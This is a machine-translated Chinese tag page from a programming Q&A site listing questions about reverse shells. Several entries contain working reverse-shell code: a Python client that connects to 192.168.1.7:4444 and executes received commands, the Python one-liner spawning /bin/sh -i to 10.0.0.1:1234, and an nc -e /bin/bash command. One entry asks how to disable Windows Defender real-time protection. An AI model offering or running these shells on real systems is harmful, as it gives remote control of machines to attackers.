问题标签 [reverse-shell]

For questions regarding programming in ECMAScript (JavaScript/JS) and its various dialects/implementations (excluding ActionScript). Note JavaScript is NOT the same as Java! Please include all relevant tags on your question; e.g., [node.js], [jquery], [json], [reactjs], [angular], [ember.js], [vue.js], [typescript], [svelte], etc.

0 投票
1 回答
1075 浏览

node.js - 带有net.socket的Nodejs反向shell

大家早上好,当我创建套接字并使用 netcat 侦听时,我在 NodeJS 中遇到了反向 shell 的问题,它完美地工作,但是当我使用 net.Server 创建新服务器时,我收到了 shell 的标头,但它不是交互式的,shell 代码是这样的:

当我用 netcat 听时,我可以得到反向 shell

但是当我想在 nodejs 中创建 TCP 服务器时出现问题,我收到 cmd.exe 的横幅但没有交互性

这是服务器部分的代码:

当我发送命令示例' dir '时,我收到一个带有位于服务器上方的管道的对象所以问题是当我发送命令时如何接收命令的结果,例如接收套接字的文件和目录列表

0 投票
1 回答
115 浏览

python - 以 (Ip,port) 为变量的 Socket 编程服务器

嗨,我想在我的服务器中将我的 ip 和端口作为用户输入,但是我遇到了一些我无法处理的错误,请帮助我...

错误 :

或者有时我得到:

0 投票
2 回答
325 浏览

windows - 如何隐藏 tcp 端口侦听器 powershell 脚本?

目标:在不显示窗口的情况下运行powershell脚本(如果它弹出几秒钟就可以了)。

问题:脚本tcplisten.ps1仅在窗口显示给用户时才有效。以下所有尝试均无效。因为当我运行时netstat -ano -p tcp,端口9999没有在监听。

tcplisten.ps1

尝试:

电源外壳程序

隐藏命令

-NoProfile -NonInteractive -ExecutionPolicy 绕过

启动过程

vbs 脚本

使用此脚本创建一个 .vbs 并运行它

问:有解决办法吗?我做错了什么吗?

0 投票
1 回答
42 浏览

php - 了解卷曲查询

我在做一个名为 Pwnlab init 的实践渗透测试虚拟机时使用了下面的 curl 查询。查询的目的是让index.php页面访问png文件,其实就是一个伪装的php后门脚本,然后让被攻击机器发出netcat命令连接到我的攻击机器。只有在研究了其他人如何能够成功完成虚拟机之后,我才知道使用此查询。我了解整个查询,除了第一部分curl --output -。有人可以帮我解决这部分查询的作用吗?

0 投票
1 回答
749 浏览

bash - 这个 bash 反向 shell 如何接受输入?

我有一个使用 netcat 在 localhost 上为端口 449 运行的侦听器。

在同样在 localhost 上运行的单独终端中,我可以运行以下命令:

然后我可以通过 netcat 连接输入命令并且它们成功执行。我可以分解上面的命令,我可以看到上面的 bash shell 将其 stderr 和 stdout 写入套接字文件描述符,该描述符被发送到我的机器并最终被 netcat 监听。此外,我可以看到标准输入被发送到标准输出,然后由外部 bash 命令执行。

关于这个的几个问题:

  1. 设置 bash 终端以接受来自 netcat 的标准输入的机制是什么?标准输入不会在命令中的任何地方重定向。
  2. 外部 bash shell 如何执行多个来自内部 bash shell 的命令输出?我最初的想法是它只能执行一个命令。
0 投票
1 回答
47 浏览

python - 如何使python文件在windows上可执行?

#!/usr/bin/python

导入子进程导入套接字

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(("192.168.1.7", 4444)) # 第一个参数是你的kali linux机器的IP地址

while True: command = sock.recv(2048) if command == "q": break else: proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess. PIPE) 结果 = proc.stdout.read() + proc.stderr.read() sock.send(result)

袜子.close()

0 投票
1 回答
201 浏览

python - 尝试更改目录时,使用 Python 命令的反向 Shell 命令卡住

我正在尝试使用带有 python 的反向 shell 获得具有完全权限的完全访问权限。

连接建立起来,我可以执行“ipconfig”或“dir”之类的命令(尽管有时我需要询问两次才能获得“dir”命令的结果。

但是,当我尝试使用“cd..”命令更改目录时,它会卡住并且不返回任何内容。

这是我的客户文件:

这是我的服务器文件:

这是我得到的以及卡住的地方:

如何获得对客户端的完全访问权限并执行任何可能的命令?

0 投票
0 回答
431 浏览

linux - 使用脚本检查 netcat 反向 shell

我用netcat做反向shell。

在旁边nc 192.168.100.113 4444 –e /bin/bash

B面nc –lvp 4444

我想使用反向shell真正工作的shell脚本从B端自动化并检查这个过程。

在 B 方面,在nc –lvp 4444我怎样才能等到我获得连接然后发送ls命令并检查结果之后?

0 投票
0 回答
376 浏览

python - Python 反壳一班轮是如何工作的?

我对 python reverse shell one liner 有一些疑问。

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

所以这是一个 python 反向 shell 一个衬里,只需通过谷歌搜索即可轻松找到。为了更好地理解这一点,让我们把它写成多行:

大部分内容都很容易理解。在第一行,我们导入必要的模块。在第二行中,我们使用 ipv4 系列和 tcp 协议创建了一个套接字对象,第三行是我们连接到我们的服务器(攻击者机器)的地方,在第 4、5、6 行中,我们将套接字文件描述符复制为 0(stdin)、1(标准输出),2(标准错误)(我在这里可能是错的)。最后我们以交互模式启动 bin/sh shell。

这工作正常,我们只需要更改要连接的 IP 地址和端口,在另一端(服务器)我们需要监听传入连接,并且可以使用 netcat 轻松完成:

我只是不明白在建立反向 shell 之后,这个客户端机器(我们在它上面运行 python reverse shell 的机器)如何发送从服务器接收到的命令的输出。我的意思是没有 send() 或 recv() 方法。

我尝试使用 python 自己编写服务器,但它无法正常工作,并且我无法接收命令的输出。(但这是一个我已经编码并且工作正常的python反向shell:https ://github.com/ramixix/Python_Reverse_Shell.git如果你检查它会很高兴)

谁能解释它是如何工作的,我怎样才能为它写一个服务器?

0 投票
2 回答
417 浏览

windows - 我无法通过 Powershell 关闭实时保护

我想尝试反向shell。我尝试使用 Powershell 命令关闭实时保护: Set-MpPreference -DisableRealtimeMonitoring $true

但它不起作用。我很确定我做的一切都是正确的。我以管理员身份打开它并运行命令。我尝试重新启动Windows,但它仍然无法正常工作